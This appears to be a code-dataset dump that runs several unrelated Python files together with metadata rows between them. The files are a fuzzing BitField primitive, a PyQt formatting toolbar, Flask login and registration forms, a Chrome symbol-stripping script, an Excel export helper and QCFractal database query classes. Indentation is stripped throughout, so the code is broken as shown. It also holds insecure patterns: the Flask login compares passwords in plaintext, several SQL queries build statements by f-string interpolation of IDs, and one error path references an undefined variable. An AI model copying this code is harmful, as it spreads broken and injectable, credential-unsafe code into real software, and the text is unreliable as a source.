:param output_format: Output format, "binary" or "ascii", defaults to binary
:type signed: bool, optional
:param signed: Make size signed vs. unsigned (applicable only with format="ascii"), defaults to False
:type full_range: bool, optional
:param full_range: If enabled the field mutates through *all* possible values, defaults to False
:type fuzz_values: list, optional
:param fuzz_values: List of custom fuzz values to add to the normal mutations, defaults to None
:type fuzzable: bool, optional
:param fuzzable: Enable/disable fuzzing of this primitive, defaults to true
"""
def __init__(
self,
name=None,
default_value=0,
width=8,
max_num=None,
endian=LITTLE_ENDIAN,
output_format="binary",
signed=False,
full_range=False,
*args,
**kwargs
):
super(BitField, self).__init__(name=name, default_value=default_value, *args, **kwargs)
assert isinstance(width, six.integer_types), "width must be an integer!"
self.width = width
self.max_num = max_num
self.endian = endian
self.format = output_format
self.signed = signed
self.full_range = full_range
if not self.max_num:
self.max_num = binary_string_to_int("1" + "0" * width)
assert isinstance(self.max_num, six.integer_types), "max_num must be an integer!"
def _iterate_fuzz_lib(self):
if self.full_range:
for i in range(0, self.max_num):
yield i
else:
# try only "smart" values.
interesting_boundaries = [
0,
self.max_num // 2,
self.max_num // 3,
self.max_num // 4,
self.max_num // 8,
self.max_num // 16,
self.max_num // 32,
self.max_num,
]
for boundary in interesting_boundaries:
for v in self._yield_integer_boundaries(boundary):
yield v
# TODO Add a way to inject a list of fuzz values
# elif isinstance(default_value, (list, tuple)):
# for val in iter(default_value):
# yield val
# TODO: Add injectable arbitrary bit fields
def _yield_integer_boundaries(self, integer):
"""
Add the supplied integer and border cases to the integer fuzz heuristics library.
@type integer: int
@param integer: int to append to fuzz heuristics
"""
for i in range(-10, 10):
case = integer + i
if 0 <= case < self.max_num:
# some day: if case not in self._user_provided_values
yield case
def encode(self, value, mutation_context):
temp = self._render_int(
value, output_format=self.format, bit_width=self.width, endian=self.endian, signed=self.signed
)
return helpers.str_to_bytes(temp)
def mutations(self, default_value):
for val in self._iterate_fuzz_lib():
yield val
@staticmethod
def _render_int(value, output_format, bit_width, endian, signed):
"""
Convert value to a bit or byte string.
Args:
value (int): Value to convert to a byte string.
output_format (str): "binary" or "ascii"
bit_width (int): Width of output in bits.
endian: BIG_ENDIAN or LITTLE_ENDIAN
signed (bool):
Returns:
str: value converted to a byte string
"""
if output_format == "binary":
bit_stream = ""
rendered = b""
# pad the bit stream to the next byte boundary.
if bit_width % 8 == 0:
bit_stream += int_to_binary_string(value, bit_width)
else:
bit_stream = "0" * (8 - (bit_width % 8))
bit_stream += int_to_binary_string(value, bit_width)
# convert the bit stream from a string of bits into raw bytes.
for i in range(len(bit_stream) // 8):
chunk_min = 8 * i
chunk_max = chunk_min + 8
chunk = bit_stream[chunk_min:chunk_max]
rendered += struct.pack("B", binary_string_to_int(chunk))
# if necessary, convert the endianness of the raw bytes.
if endian == LITTLE_ENDIAN:
# reverse the bytes
rendered = rendered[::-1]
_rendered = rendered
else:
# Otherwise we have ascii/something else
# if the sign flag is raised and we are dealing with a signed integer (first bit is 1).
if signed and int_to_binary_string(value, bit_width)[0] == "1":
max_num = binary_string_to_int("1" + "0" * (bit_width - 1))
# chop off the sign bit.
val = value & binary_string_to_int("1" * (bit_width - 1))
# account for the fact that the negative scale works backwards.
val = max_num - val - 1
# toss in the negative sign.
_rendered = "%d" % ~val
# unsigned integer or positive signed integer.
else:
_rendered = "%d" % value
return _rendered
| gpl-2.0 | 3,794,698,004,206,549,500 | 33.564356 | 120 | 0.574048 | false | 4.049884 | false | false | false |
mtils/ems | ems/qt/richtext/char_format_actions.py | 1 | 6238 |
from ems.qt import QtWidgets, QtCore, QtGui
from ems.qt.richtext.char_format_proxy import CharFormatProxy
Qt = QtCore.Qt
QObject = QtCore.QObject
QColor = QtGui.QColor
QAction = QtWidgets.QAction
QKeySequence = QtGui.QKeySequence
QFont = QtGui.QFont
QIcon = QtGui.QIcon
QPixmap = QtGui.QPixmap
ThemeIcon = QIcon.fromTheme
QApplication = QtWidgets.QApplication
QColorDialog = QtWidgets.QColorDialog
QFontComboBox = QtWidgets.QFontComboBox
QComboBox = QtWidgets.QComboBox
QFontDatabase = QtGui.QFontDatabase
QTextDocument = QtGui.QTextDocument
QTextCharFormat = QtGui.QTextCharFormat
pyqtSignal = QtCore.pyqtSignal
pyqtSlot = QtCore.pyqtSlot
pyqtProperty = QtCore.pyqtProperty
class CharFormatActions(QObject):
documentChanged = pyqtSignal(QTextDocument)
currentBlockFormatChanged = pyqtSignal(QTextCharFormat)
def __init__(self, parentWidget, signalProxy=None, resourcePath=':/text-editor'):
super(CharFormatActions, self).__init__(parentWidget)
self.resourcePath = resourcePath
self.actions = []
self.widgets = []
self.signals = CharFormatProxy(self) if signalProxy is None else signalProxy
self._addActions(self.parent())
self._document = QTextDocument()
self._lastBlockFormat = None
def getDocument(self):
return self._document
@pyqtSlot(QTextDocument)
def setDocument(self, document):
if self._document is document:
return
if self._document:
self._disconnectFromDocument(self._document)
self._document = document
self.documentChanged.emit(self._document)
document = pyqtProperty(QTextDocument, getDocument, setDocument)
def _disconnectFromDocument(self, document):
return
def _addActions(self, parent):
self.actionTextBold = QAction(
ThemeIcon('format-text-bold', self._icon('bold.png')),
"&Bold", parent, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_B,
triggered=self.signals.setBold, checkable=True)
bold = QFont()
bold.setBold(True)
self.actionTextBold.setFont(bold)
self.signals.boldChanged.connect(self.actionTextBold.setChecked)
self.actions.append(self.actionTextBold)
self.actionTextItalic = QAction(
ThemeIcon('format-text-italic', self._icon('italic.png')),
"&Italic", self, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_I,
triggered=self.signals.setItalic, checkable=True)
italic = QFont()
italic.setItalic(True)
self.actionTextItalic.setFont(italic)
self.signals.italicChanged.connect(self.actionTextItalic.setChecked)
self.actions.append(self.actionTextItalic)
self.actionTextUnderline = QAction(
ThemeIcon('format-text-underline', self._icon('underline.png')),
"&Underline", self, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_U,
triggered=self.signals.setUnderline, checkable=True)
underline = QFont()
underline.setUnderline(True)
self.actionTextUnderline.setFont(underline)
self.actions.append(self.actionTextUnderline)
self.signals.underlineChanged.connect(self.actionTextUnderline.setChecked)
pix = QPixmap(16, 16)
pix.fill(Qt.black)
self.actionTextColor = QAction(QIcon(pix), "&Color...",
self, triggered=self._textColor)
self.signals.foregroundColorChanged.connect(self._colorChanged)
self.actions.append(self.actionTextColor)
self.actionClearFormat = QAction(ThemeIcon('format-text-clear', self._icon('magic.png')),
"&Remove Format", self, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_E,
triggered=self.signals.clearFormat)
self.actions.append(self.actionClearFormat)
self.fontCombo = QFontComboBox()
self.fontCombo.activated[str].connect(self.signals.setFontFamily)
self.signals.fontFamilyChanged.connect(self.setFontFamily)
self.widgets.append(self.fontCombo)
self.sizeCombo = QComboBox()
self.sizeCombo.setObjectName("sizeCombo")
self.sizeCombo.setEditable(True)
self.signals.pointSizeChanged.connect(self.setFontPointSize)
self.widgets.append(self.sizeCombo)
db = QFontDatabase()
for size in db.standardSizes():
self.sizeCombo.addItem("{}".format(size))
self.sizeCombo.activated[str].connect(self._textSize)
self.sizeCombo.setCurrentIndex(
self.sizeCombo.findText(
"{}".format(QApplication.font().pointSize())
)
)
def _textColor(self):
color = self.signals.getForegroundColor()
if not color:
color = QColor(0,0,0)
col = QColorDialog.getColor(color, self.parent())
if not col.isValid():
return
self.signals.setForegroundColor(col)
def _colorChanged(self, color):
pix = QPixmap(16, 16)
pix.fill(color)
self.actionTextColor.setIcon(QIcon(pix))
def _textSize(self, pointSize):
pointSize = float(pointSize)
if pointSize < 0:
return
self.signals.setPointSize(pointSize)
def addToToolbar(self, toolbar, addActions=True, addWidgets=True):
if addActions:
for action in self.actions:
toolbar.addAction(action)
if not addWidgets:
return
for widget in self.widgets:
widget.setParent(toolbar)
toolbar.addWidget(widget)
def setFontFamily(self, family):
self.fontCombo.setCurrentIndex(self.fontCombo.findText(family))
def setFontPointSize(self, pointSize):
self.sizeCombo.setCurrentIndex(self.sizeCombo.findText("{}".format(int(pointSize))))
def iconPath(self, fileName):
return self.resourcePath + '/' + fileName
def _icon(self, fileName):
return QIcon(self.iconPath(fileName)) | mit | 4,689,382,300,073,918,000 | 32.543011 | 97 | 0.648124 | false | 4.14485 | false | false | false |
Murano/microqa | app/forms.py | 1 | 1790 | # -*- coding: utf-8 -*-
from flask import flash
from flask_wtf import Form
from wtforms import StringField, TextAreaField, PasswordField, TextField
from model import User
from wtforms.validators import DataRequired, ValidationError
class QuestionForm(Form):
title = StringField(u"Заголовок вопроса", validators=[DataRequired()])
body = TextAreaField(u"Тело вопроса", validators=[DataRequired()])
tags = StringField(u"Тэги (через запятую)", validators=[DataRequired()])
class CommentForm(Form):
body = TextAreaField(u"Ответ", validators=[DataRequired()])
class LoginForm(Form):
username = StringField(u"Логин", validators=[DataRequired()])
password = PasswordField(u"Пароль", validators=[DataRequired()])
def validate_username(self, field):
user = self.get_user()
if user is None:
raise ValidationError(u'Неверное имя пользователя')
if user.password != self.password.data:
raise ValidationError(u'Неверный пароль')
def get_user(self):
return User.objects(username=self.username.data).first()
class RegistrationForm(Form):
username = TextField(u"Логин", validators=[DataRequired()])
email = TextField(u"E-mail", validators=[DataRequired()] ) # TODO: validate
password = PasswordField(u"Пароль", validators=[DataRequired()])
def validate_username(self, field):
if User.objects(username=self.username.data):
raise ValidationError(u'Такой логин уже занят')
def validate_email(self, field):
if User.objects(email=self.email.data):
raise ValidationError(u'Такой email адрес уже существует') | mit | 4,633,618,319,600,694,000 | 36.340909 | 79 | 0.704019 | false | 3.232283 | false | false | false |
OSVR/UIforETWbins | bin/StripChromeSymbols.py | 1 | 13713 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This script exists to work around severe performance problems when WPA or other
Windows Performance Toolkit programs try to load the symbols for the Chrome
web browser. Some combination of the enormous size of the symbols or the
enhanced debug information generated by /Zo causes WPA to take about twenty
minutes to process the symbols for chrome.dll and chrome_child.dll. When
profiling Chrome this delay happens with every new set of symbols, so with
every new version of Chrome.
This script uses xperf actions to dump a list of the symbols referenced in
an ETW trace. If chrome.dll, chrome_child.dll, content.dll, or blink_web.dll are
detected and if decoded symbols are not found in %_NT_SYMCACHE_PATH% (default is
c:\symcache) then RetrieveSymbols.exe is used to download the symbols from the
Chromium symbol server, pdbcopy.exe is used to strip the private symbols, and
then another xperf action is used to load the stripped symbols, thus converting
them to .symcache files that can be efficiently loaded by WPA.
Locally built Chrome symbols are also supported.
More details on the discovery of this slowness and the evolution of the fix
can be found here:
https://randomascii.wordpress.com/2014/11/04/slow-symbol-loading-in-microsofts-profiler-take-two/
Discussion can be found here:
https://randomascii.wordpress.com/2013/03/09/symbols-the-microsoft-way/
Source code for RetrieveSymbols.exe can be found here:
https://github.com/google/UIforETW/tree/master/RetrieveSymbols
If "chromium-browser-symsrv" is not found in _NT_SYMBOL_PATH or RetrieveSymbols.exe
and pdbcopy.exe are not found then this script will exit early.
With the 10.0.14393 version of WPA the symbol translation problems have largely
been eliminated, which seems like it would make this script unnecessary, but the
symbol translation slowdowns have been replaced by a bug in downloading symbols from
Chrome's symbol server.
"""
from __future__ import print_function
import os
import sys
import re
import tempfile
import shutil
import subprocess
# Set to true to do symbol translation as well as downloading. Set to
# false to just download symbols and let WPA translate them.
strip_and_translate = True
def main():
if len(sys.argv) < 2:
print("Usage: %s trace.etl" % sys.argv[0])
sys.exit(0)
# Our usage of subprocess seems to require Python 2.7+
if sys.version_info.major == 2 and sys.version_info.minor < 7:
print("Your python version is too old - 2.7 or higher required.")
print("Python version is %s" % sys.version)
sys.exit(0)
symbol_path = os.environ.get("_NT_SYMBOL_PATH", "")
if symbol_path.count("chromium-browser-symsrv") == 0:
print("Chromium symbol server is not in _NT_SYMBOL_PATH. No symbol stripping needed.")
sys.exit(0)
script_dir = os.path.split(sys.argv[0])[0]
retrieve_path = os.path.join(script_dir, "RetrieveSymbols.exe")
pdbcopy_path = os.path.join(script_dir, "pdbcopy.exe")
if os.environ.has_key("programfiles(x86)"):
# The UIforETW copy of pdbcopy.exe fails to copy some Chrome PDBs that the
# Windows 10 SDK version can copy - use it if present.
pdbcopy_install = os.path.join(os.environ["programfiles(x86)"], r"Windows kits\10\debuggers\x86\pdbcopy.exe")
if os.path.exists(pdbcopy_install):
pdbcopy_path = pdbcopy_install
# This tool converts PDBs created with /debug:fastlink (VC++ 2015 feature) to
# regular PDBs that contain all of the symbol information directly. This is
# required so that pdbcopy can copy the symbols.
un_fastlink_tool = r"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\amd64\mspdbcmf.exe"
if not os.path.exists(un_fastlink_tool):
un_fastlink_tool = None
# RetrieveSymbols.exe requires some support files. dbghelp.dll and symsrv.dll
# have to be in the same directory as RetrieveSymbols.exe and pdbcopy.exe must
# be in the path, so copy them all to the script directory.
for third_party in ["pdbcopy.exe", "dbghelp.dll", "symsrv.dll"]:
if not os.path.exists(third_party):
source = os.path.normpath(os.path.join(script_dir, r"..\third_party", \
third_party))
dest = os.path.normpath(os.path.join(script_dir, third_party))
shutil.copy2(source, dest)
if not os.path.exists(pdbcopy_path):
print("pdbcopy.exe not found. No symbol stripping is possible.")
sys.exit(0)
if not os.path.exists(retrieve_path):
print("RetrieveSymbols.exe not found. No symbol retrieval is possible.")
sys.exit(0)
tracename = sys.argv[1]
# Each symbol file that we pdbcopy gets copied to a separate directory so
# that we can support decoding symbols for multiple chrome versions without
# filename collisions.
tempdirs = []
# Typical output looks like:
# "[RSDS] PdbSig: {0e7712be-af06-4421-884b-496f833c8ec1}; Age: 33; Pdb: D:\src\chromium2\src\out\Release\initial\chrome.dll.pdb"
# Note that this output implies a .symcache filename like this:
# chrome.dll-0e7712beaf064421884b496f833c8ec121v2.symcache
# In particular, note that the xperf action prints the age in decimal, but the
# symcache names use the age in hexadecimal!
pdb_re = re.compile(r'"\[RSDS\] PdbSig: {(.*-.*-.*-.*-.*)}; Age: (.*); Pdb: (.*)"')
pdb_cached_re = re.compile(r"Found .*file - placed it in (.*)")
print("Pre-translating chrome symbols from stripped PDBs to avoid 10-15 minute translation times "
"and to work around WPA symbol download bugs.")
symcache_files = []
# Keep track of the local symbol files so that we can temporarily rename them
# to stop xperf from using -- rename them from .pdb to .pdbx
local_symbol_files = []
#-tle = tolerate lost events
#-tti = tolerate time ivnersions
#-a symcache = show image and symbol identification (see xperf -help processing)
#-dbgid = show symbol identification information (see xperf -help symcache)
command = 'xperf -i "%s" -tle -tti -a symcache -dbgid' % tracename
print("> %s" % command)
found_uncached = False
raw_command_output = subprocess.check_output(command, stderr=subprocess.STDOUT)
command_output = str(raw_command_output).splitlines()
for line in command_output:
dllMatch = None # This is the name to use when generating the .symcache files
if line.count("chrome_child.dll") > 0:
# The symcache files for chrome_child.dll use the name chrome.dll for some reason
dllMatch = "chrome.dll"
# Complete list of Chrome executables and binaries. Some are only used in internal builds.
# Note that case matters for downloading PDBs.
for dllName in ["chrome.exe", "chrome.dll", "blink_web.dll", "content.dll", "chrome_elf.dll", "chrome_watcher.dll", "libEGL.dll", "libGLESv2.dll"]:
if line.count("\\" + dllName) > 0:
dllMatch = dllName
if dllMatch:
match = pdb_re.match(line)
if match:
guid, age, path = match.groups()
guid = guid.replace("-", "")
age = int(age) # Prepare for printing as hex
filepart = os.path.split(path)[1]
symcache_file = r"c:\symcache\%s-%s%xv2.symcache" % (dllMatch, guid, age)
if os.path.exists(symcache_file):
#print("Symcache file %s already exists. Skipping." % symcache_file)
continue
# Only print messages for chrome PDBs that aren't in the symcache
found_uncached = True
print("Found uncached reference to %s: %s - %s" % (filepart, guid, age, ))
symcache_files.append(symcache_file)
pdb_cache_path = None
retrieve_command = "%s %s %s %s" % (retrieve_path, guid, age, filepart)
print(" > %s" % retrieve_command)
for subline in os.popen(retrieve_command):
cache_match = pdb_cached_re.match(subline.strip())
if cache_match:
pdb_cache_path = cache_match.groups()[0]
# RetrieveSymbols puts a period at the end of the output, so strip that.
if pdb_cache_path.endswith("."):
pdb_cache_path = pdb_cache_path[:-1]
if strip_and_translate and not pdb_cache_path:
# Look for locally built symbols
if os.path.exists(path):
pdb_cache_path = path
local_symbol_files.append(path)
if pdb_cache_path:
if strip_and_translate:
tempdir = tempfile.mkdtemp()
tempdirs.append(tempdir)
dest_path = os.path.join(tempdir, os.path.basename(pdb_cache_path))
print(" Copying PDB to %s" % dest_path)
# For some reason putting quotes around the command to be run causes
# it to fail. So don't do that.
copy_command = '%s "%s" "%s" -p' % (pdbcopy_path, pdb_cache_path, dest_path)
print(" > %s" % copy_command)
if un_fastlink_tool:
# If the un_fastlink_tool is available then run the pdbcopy command in a
# try block. If pdbcopy fails then run the un_fastlink_tool and try again.
try:
output = str(subprocess.check_output(copy_command, stderr=subprocess.STDOUT))
if output:
print(" %s" % output, end="")
except:
convert_command = '%s "%s"' % (un_fastlink_tool, pdb_cache_path)
print("Attempting to un-fastlink PDB so that pdbcopy can strip it. This may be slow.")
print(" > %s" % convert_command)
subprocess.check_output(convert_command)
output = str(subprocess.check_output(copy_command, stderr=subprocess.STDOUT))
if output:
print(" %s" % output, end="")
else:
output = str(subprocess.check_output(copy_command, stderr=subprocess.STDOUT))
if output:
print(" %s" % output, end="")
if not os.path.exists(dest_path):
print("Aborting symbol generation because stripped PDB '%s' does not exist. WPA symbol loading may be slow." % dest_path)
sys.exit(0)
else:
print(" Symbols retrieved.")
else:
print(" Failed to retrieve symbols.")
if tempdirs:
symbol_path = ";".join(tempdirs)
print("Stripped PDBs are in %s. Converting to symcache files now." % symbol_path)
os.environ["_NT_SYMBOL_PATH"] = symbol_path
# Create a list of to/from renamed tuples
renames = []
error = False
try:
rename_errors = False
for local_pdb in local_symbol_files:
temp_name = local_pdb + "x"
print("Renaming %s to %s to stop unstripped PDBs from being used." % (local_pdb, temp_name))
try:
# If the destination file exists we have to rename it or else the
# rename will fail.
if os.path.exists(temp_name):
os.remove(temp_name)
os.rename(local_pdb, temp_name)
except:
# Rename can and does throw exceptions. We must catch and continue.
e = sys.exc_info()[0]
print("Hit exception while renaming %s to %s. Continuing.\n%s" % (local_pdb, temp_name, e))
rename_errors = True
else:
renames.append((local_pdb, temp_name))
#-build = build the symcache store for this trace (see xperf -help symcache)
if rename_errors:
print("Skipping symbol generation due to PDB rename errors. WPA symbol loading may be slow.")
else:
gen_command = 'xperf -i "%s" -symbols -tle -tti -a symcache -build' % tracename
print("> %s" % gen_command)
for line in os.popen(gen_command).readlines():
pass # Don't print line
except KeyboardInterrupt:
# Catch Ctrl+C exception so that PDBs will get renamed back.
if renames:
print("Ctrl+C detected. Renaming PDBs back.")
error = True
for rename_names in renames:
try:
os.rename(rename_names[1], rename_names[0])
except:
# Rename can and does throw exceptions. We must catch and continue.
e = sys.exc_info()[0]
print("Hit exception while renaming %s back. Continuing.\n%s" % (rename_names[1], e))
for symcache_file in symcache_files:
if os.path.exists(symcache_file):
print("%s generated." % symcache_file)
else:
print("Error: %s not generated." % symcache_file)
error = True
# Delete the stripped PDB files
if error:
print("Retaining PDBs to allow rerunning xperf command-line.")
print("If re-running the command be sure to go:")
print("set _NT_SYMBOL_PATH=%s" % symbol_path)
else:
for directory in tempdirs:
shutil.rmtree(directory, ignore_errors=True)
elif strip_and_translate:
if found_uncached:
print("No PDBs copied, nothing to do.")
else:
print("No uncached PDBS found, nothing to do.")
if __name__ == "__main__":
main()
| apache-2.0 | 8,157,729,412,689,827,000 | 44.795222 | 151 | 0.651448 | false | 3.702674 | false | false | false |
Loreton/MP3Catalog | Source/Project/ExcelDB/ExcelCatalog.py | 1 | 1400 | #!/usr/bin/python
# -*- coding: iso-8859-1 -*-
#
# Scope: Programma per ...........
# by Loreto Notarantonio 2013, February
# ######################################################################################
import os, sys
import ast
################################################################################
# - M A I N
# - Prevede:
# - 2 - Controllo parametri di input
# - 5 - Chiamata al programma principale del progetto
################################################################################
def ReadExcelDB(gv, xlsFile, rangeToProcess):
logger = gv.Ln.SetLogger(package=__name__)
C = gv.Ln.LnColor()
csvFileInput = xlsFile.rsplit('.', -1)[0] + '.csv'
logger.debug('XLS file name: {0}'.format(xlsFile))
logger.debug('CSV file name: {0}'.format(csvFileInput))
# - Se il csv è più vecchio dell'xls facciamo l'export
if gv.Ln.Fmtime(xlsFile) > gv.Ln.Fmtime(csvFileInput):
msg= 'range To process: {0}'.format(rangeToProcess)
logger.debug(msg); print(msg)
mydata = gv.Ln.Excel(xlsFile)
mydata.exportCSV('Catalog', outFname=csvFileInput, rangeString=rangeToProcess, colNames=4, fPRINT=True)
else:
msg = 'excel file is older than CSV file. No export will take place.'
logger.debug(msg); print(msg)
return csvFileInput
| unlicense | -2,451,188,132,575,044,000 | 32.333333 | 111 | 0.502143 | false | 3.655352 | false | false | false |
psi4/mongo_qcdb | qcfractal/storage_sockets/db_queries.py | 1 | 14717 | from typing import List, Optional, Set, Union
from sqlalchemy import Integer, inspect
from sqlalchemy.sql import bindparam, text
from qcfractal.interface.models import Molecule, ResultRecord
from qcfractal.storage_sockets.models import MoleculeORM, ResultORM
QUERY_CLASSES = set()
class QueryBase:
# The name/alias used by the REST APIs to access this class
_class_name = None
_available_groupby = set()
# Mapping of the requested feature and the internal query method
_query_method_map = {}
def __init__(self, database_name, max_limit=1000):
self.database_name = database_name
self.max_limit = max_limit
def __init_subclass__(cls, **kwargs):
if cls not in QUERY_CLASSES:
QUERY_CLASSES.add(cls)
super().__init_subclass__(**kwargs)
def query(self, session, query_key, limit=0, skip=0, include=None, exclude=None, **kwargs):
if query_key not in self._query_method_map:
raise TypeError(f"Query type {query_key} is unimplemented for class {self._class_name}")
self.session = session
return getattr(self, self._query_method_map[query_key])(**kwargs)
def execute_query(self, sql_statement, with_keys=True, **kwargs):
"""Execute sql statemet, apply limit, and return results as dict if needed"""
# TODO: check count first, way to iterate
# sql_statement += f' LIMIT {self.max_limit}'
result = self.session.execute(sql_statement, kwargs)
keys = result.keys() # get keys before fetching
result = result.fetchall()
self.session.commit()
# create a list of dict with the keys and values of the results (instead of tuples)
if with_keys:
result = [dict(zip(keys, res)) for res in result]
return result
def _base_count(self, table_name: str, available_groupbys: Set[str], groupby: Optional[List[str]] = None):
if groupby:
bad_groups = set(groupby) - available_groupbys
if bad_groups:
raise AttributeError(f"The following groups are not permissible: {missing}")
global_str = ", ".join(groupby)
select_str = global_str + ", "
extra_str = f"""GROUP BY {global_str}\nORDER BY {global_str}"""
else:
select_str = ""
extra_str = ""
sql_statement = f"""
select {select_str}count(*) from {table_name}
{extra_str}
"""
ret = self.execute_query(sql_statement, with_keys=True)
if groupby:
return ret
else:
return ret[0]["count"]
@staticmethod
def _raise_missing_attribute(cls, query_key, missing_attribute, amend_msg=""):
"""Raises error for missing attribute in a message suitable for the REST user"""
raise AttributeError(f"To query {cls._class_name} for {query_key} " f"you must provide {missing_attribute}.")
# ----------------------------------------------------------------------------
class TaskQueries(QueryBase):
_class_name = "task"
_query_method_map = {"counts": "_task_counts"}
def _task_counts(self):
sql_statement = f"""
SELECT tag, priority, status, count(*)
FROM task_queue
WHERE True
group by tag, priority, status
order by tag, priority, status
"""
return self.execute_query(sql_statement, with_keys=True)
# ----------------------------------------------------------------------------
class DatabaseStatQueries(QueryBase):
_class_name = "database_stats"
_query_method_map = {
"table_count": "_table_count",
"database_size": "_database_size",
"table_information": "_table_information",
}
def _table_count(self, table_name=None):
if table_name is None:
self._raise_missing_attribute("table_name", "table name")
sql_statement = f"SELECT count(*) from {table_name}"
return self.execute_query(sql_statement, with_keys=False)[0]
def _database_size(self):
sql_statement = f"SELECT pg_database_size('{self.database_name}')"
return self.execute_query(sql_statement, with_keys=True)[0]["pg_database_size"]
def _table_information(self):
sql_statement = f"""
SELECT relname AS table_name
, c.reltuples::BIGINT AS row_estimate
, pg_total_relation_size(c.oid) AS total_bytes
, pg_indexes_size(c.oid) AS index_bytes
, pg_total_relation_size(reltoastrelid) AS toast_bytes
FROM pg_class c
LEFT JOIN pg_namespace n ON n.oid = c.relnamespace
WHERE relkind = 'r';
"""
result = self.execute_query(sql_statement, with_keys=False)
ret = []
for row in result:
if ("pg_" in row[0]) or ("sql_" in row[0]):
continue
ret.append(list(row))
ret = {"columns": ["table_name", "row_estimate", "total_bytes", "index_bytes", "toast_bytes"], "rows": ret}
return ret
class ResultQueries(QueryBase):
_class_name = "result"
_query_method_map = {"count": "_count"}
def _count(self, groupby: Optional[List[str]] = None):
available_groupbys = {"result_type", "status"}
return self._base_count("base_result", available_groupbys, groupby=groupby)
class MoleculeQueries(QueryBase):
_class_name = "molecule"
_query_method_map = {"count": "_count"}
def _count(self, groupby: Optional[List[str]] = None):
available_groupbys = set()
return self._base_count("molecule", available_groupbys, groupby=groupby)
# ----------------------------------------------------------------------------
class TorsionDriveQueries(QueryBase):
_class_name = "torsiondrive"
_query_method_map = {
"initial_molecules": "_get_initial_molecules",
"initial_molecules_ids": "_get_initial_molecules_ids",
"final_molecules": "_get_final_molecules",
"final_molecules_ids": "_get_final_molecules_ids",
"return_results": "_get_return_results",
}
def _get_initial_molecules_ids(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("initial_molecules_ids", "torsion drive id")
sql_statement = f"""
select initial_molecule from optimization_procedure as opt where opt.id in
(
select opt_id from optimization_history where torsion_id = {torsion_id}
)
order by opt.id
"""
return self.execute_query(sql_statement, with_keys=False)
def _get_initial_molecules(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("initial_molecules", "torsion drive id")
sql_statement = f"""
select molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.initial_molecule
where opt.id in
(select opt_id from optimization_history where torsion_id = {torsion_id})
"""
return self.execute_query(sql_statement, with_keys=True)
def _get_final_molecules_ids(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("final_molecules_ids", "torsion drive id")
sql_statement = f"""
select final_molecule from optimization_procedure as opt where opt.id in
(
select opt_id from optimization_history where torsion_id = {torsion_id}
)
order by opt.id
"""
return self.execute_query(sql_statement, with_keys=False)
def _get_final_molecules(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("final_molecules", "torsion drive id")
sql_statement = f"""
select molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.final_molecule
where opt.id in
(select opt_id from optimization_history where torsion_id = {torsion_id})
"""
return self.execute_query(sql_statement, with_keys=True)
def _get_return_results(self, torsion_id=None):
"""All return results ids of a torsion drive"""
if torsion_id is None:
self._raise_missing_attribute("return_results", "torsion drive id")
sql_statement = f"""
select opt_res.opt_id, result.id as result_id, result.return_result from result
join opt_result_association as opt_res
on result.id = opt_res.result_id
where opt_res.opt_id in
(
select opt_id from optimization_history where torsion_id = {torsion_id}
)
"""
return self.execute_query(sql_statement, with_keys=False)
class OptimizationQueries(QueryBase):
_class_name = "optimization"
_exclude = ["molecule_hash", "molecular_formula", "result_type"]
_query_method_map = {
"all_results": "_get_all_results",
"final_result": "_get_final_results",
"initial_molecule": "_get_initial_molecules",
"final_molecule": "_get_final_molecules",
}
def _remove_excluded_keys(self, data):
for key in self._exclude:
data.pop(key, None)
def _get_all_results(self, optimization_ids: List[Union[int, str]] = None):
"""Returns all the results objects (trajectory) of each optmization
Returns list(list) """
if optimization_ids is None:
self._raise_missing_attribute("all_results", "List of optimizations ids")
# row_to_json(result.*)
sql_statement = text(
"""
select * from base_result
join (
select opt_id, result.* from result
join opt_result_association as traj
on result.id = traj.result_id
where traj.opt_id in :optimization_ids
) result
on base_result.id = result.id
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(ResultORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
if key not in ret:
ret[key] = []
ret[key].append(ResultRecord(**rec))
return ret
def _get_final_results(self, optimization_ids: List[Union[int, str]] = None):
"""Return the actual results objects of the best result in each optimization"""
if optimization_ids is None:
self._raise_missing_attribute("final_result", "List of optimizations ids")
sql_statement = text(
"""
select * from base_result
join (
select opt_id, result.* from result
join (
select opt.opt_id, opt.result_id, max_pos from opt_result_association as opt
inner join (
select opt_id, max(position) as max_pos from opt_result_association
where opt_id in :optimization_ids
group by opt_id
) opt2
on opt.opt_id = opt2.opt_id and opt.position = opt2.max_pos
) traj
on result.id = traj.result_id
) result
on base_result.id = result.id
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(ResultORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
ret[key] = ResultRecord(**rec)
return ret
def _get_initial_molecules(self, optimization_ids=None):
if optimization_ids is None:
self._raise_missing_attribute("initial_molecule", "List of optimizations ids")
sql_statement = text(
"""
select opt.id as opt_id, molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.initial_molecule
where opt.id in :optimization_ids
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
